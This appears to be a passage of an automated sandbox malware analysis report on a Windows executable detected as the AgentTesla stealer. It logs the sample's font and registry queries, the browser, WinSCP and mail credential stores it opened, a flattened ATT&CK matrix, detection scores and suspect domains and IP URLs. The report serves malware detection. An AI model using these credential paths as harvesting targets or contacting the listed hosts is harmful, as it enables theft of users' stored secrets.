                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.LOG1.5.dr, Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.LOG1.5.dr, Amcache.hve.5.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.LOG1.5.dr, Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.LOG1.5.dr, Amcache.hve.5.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3008889130.0000000003042000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3008889130.000000000301E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3008889130.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3006802921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 43772, type: MEMORYSTR
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: Yara matchFile source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3008889130.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3006802921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 43772, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3008889130.0000000003042000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3008889130.000000000301E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3008889130.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3006802921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 43772, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		211
                  Process Injection                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  Query Registry                  		Remote Services1
                  Email Collection                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading                  		261
                  Virtualization/Sandbox Evasion                  		1
                  Credentials in Registry                  		541
                  Security Software Discovery                  		Remote Desktop Protocol1
                  Archive Collected Data                  		11
                  Non-Standard Port                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
                  Process Injection                  		Security Account Manager1
                  Process Discovery                  		SMB/Windows Admin Shares1
                  Data from Local System                  		3
                  Ingress Tool Transfer                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Obfuscated Files or Information                  		NTDS261
                  Virtualization/Sandbox Evasion                  		Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Timestomp                  		LSA Secrets1
                  Application Window Discovery                  		SSHKeylogging24
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials1
                  System Network Configuration Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  File and Directory Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem34
                  System Information Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe22%VirustotalBrowse
                  SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe24%ReversingLabs
                  SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe100%AviraHEUR/AGEN.1313217
                  SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  ktxcomay.com.vn0%VirustotalBrowse
                  artemis-rat.com2%VirustotalBrowse
                  fp2e7a.wpc.phicdn.net0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://125.141.151.830%Avira URL Cloudsafe
                  http://103.169.254.186:8061://proxy0%Avira URL Cloudsafe
                  http://103.116.118.10:41450%Avira URL Cloudsafe
                  http://170.210.121.190:8080://proxy0%Avira URL Cloudsafe
                  http://102.223.176.18:80920%Avira URL Cloudsafe
                  http://125.141.151.832%VirustotalBrowse
                  http://103.116.118.10:41451%VirustotalBrowse
                  http://14.207.167.114:8080://proxy0%Avira URL Cloudsafe
                  http://132.148.129.254:266060%Avira URL Cloudsafe
                  http://103.169.254.186:8061://proxy1%VirustotalBrowse
                  http://154.79.254.236:32650://proxy0%Avira URL Cloudsafe
                  http://159.223.166.21:5199://proxy0%Avira URL Cloudsafe
